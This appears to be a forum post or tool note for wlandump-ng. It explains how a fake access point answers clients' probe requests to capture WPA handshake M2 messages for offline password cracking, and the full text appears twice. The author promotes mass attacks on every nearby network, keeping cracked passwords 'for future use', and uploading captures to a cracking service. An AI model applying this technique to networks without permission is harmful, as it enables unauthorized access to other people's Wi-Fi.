Well, answering every probe request, makes it possible that a client will try to connect to us. In that case, we are the access point (ap) which the client expected to see. This is an attempt to get the M2 of the client (and that works perfect).
The authentication process is very simple to understand:
th client sends a probe request
the ap responds sending a probe response
the clients sends an authentication request
the ap responds to the authentication request
the client sends an association request
the ap acknowledges and sends an authentication response followed by the M1
the client acknowledges and sends the M2
if the M2 is ok, the ap  acknowledges and sends the M3 (that means the client is authenticated)
if the M3 is ok the client acknowledges and sends the M4 (that means the ap is authenticated)
now the data transfer can begin
Using the defaults, a client probes every ap which has an entry in his wpa_supplicant.conf.
A stupid client also probes his 5GHz ap on 2.4GHz!
wlandump-ng accepts and sends a M1 (we are just friendly and give the client what he wants).
After receiving this M1 the client sends us his M2, because he can't resist us. So we receive a valid M2, calculated from an entry in his wpa_supplicant.conf.
wlandump-ng will show us this (using the -s xx option):
transmitted m1/received appropriate m2...: 343/719
and the regular messages from a real ap connected to a client:
received regular m1/m2/m3/m4.............: 146/98/143/68
Since we know our mac and our anonce (both are part of the authentication process and the calculation of the keys), we can start to crack the hash without the M1 of the legitimate ap.
Keep in mind:
1) This attack works only on the message_pair M1/M2.
We can not be shure that the network we cracked, is the network we expected to crack (for example if different networks uses the same essid: dlink, linksys, home, ASUS).
But nevermind, we cracked a network, we got a password and we can save the password to our database for analyses or future use.
2) The aim is not to crack a single net using a single password. The aim is to break the system by running massive attacks against all received nets. So we are able to calculate default keyspaces, default passwords, default password calculation algos, most used passwords, and more.... (Alex makes a real good job: https://github.com/RealEnder/routerkeygenPC).
So please upload your caps here:
(wlancap2hcx: -p <file> : output merged pcap file (upload this file to http://wpa-sec.stanev.org)
The -b option (beaconing on the last 10 probes) will seduce clients which do not send probes, yet, to probe us and then to connect us.
The authentication process is very simple to understand:
th client sends a probe request
the ap responds sending a probe response
the clients sends an authentication request
the ap responds to the authentication request
the client sends an association request
the ap acknowledges and sends an authentication response followed by the M1
the client acknowledges and sends the M2
if the M2 is ok, the ap  acknowledges and sends the M3 (that means the client is authenticated)
if the M3 is ok the client acknowledges and sends the M4 (that means the ap is authenticated)
now the data transfer can begin
Using the defaults, a client probes every ap which has an entry in his wpa_supplicant.conf.
A stupid client also probes his 5GHz ap on 2.4GHz!
wlandump-ng accepts and sends a M1 (we are just friendly and give the client what he wants).
After receiving this M1 the client sends us his M2, because he can't resist us. So we receive a valid M2, calculated from an entry in his wpa_supplicant.conf.
wlandump-ng will show us this (using the -s xx option):
transmitted m1/received appropriate m2...: 343/719
and the regular messages from a real ap connected to a client:
received regular m1/m2/m3/m4.............: 146/98/143/68
Since we know our mac and our anonce (both are part of the authentication process and the calculation of the keys), we can start to crack the hash without the M1 of the legitimate ap.
Keep in mind:
1) This attack works only on the message_pair M1/M2.
We can not be shure that the network we cracked, is the network we expected to crack (for example if different networks uses the same essid: dlink, linksys, home, ASUS).
But nevermind, we cracked a network, we got a password and we can save the password to our database for analyses or future use.
2) The aim is not to crack a single net using a single password. The aim is to break the system by running massive attacks against all received nets. So we are able to calculate default keyspaces, default passwords, default password calculation algos, most used passwords, and more.... (Alex makes a real good job: https://github.com/RealEnder/routerkeygenPC).
So please upload your caps here:
(wlancap2hcx: -p <file> : output merged pcap file (upload this file to http://wpa-sec.stanev.org)
The -b option (beaconing on the last 10 probes) will seduce clients which do not send probes, yet, to probe us and then to connect us.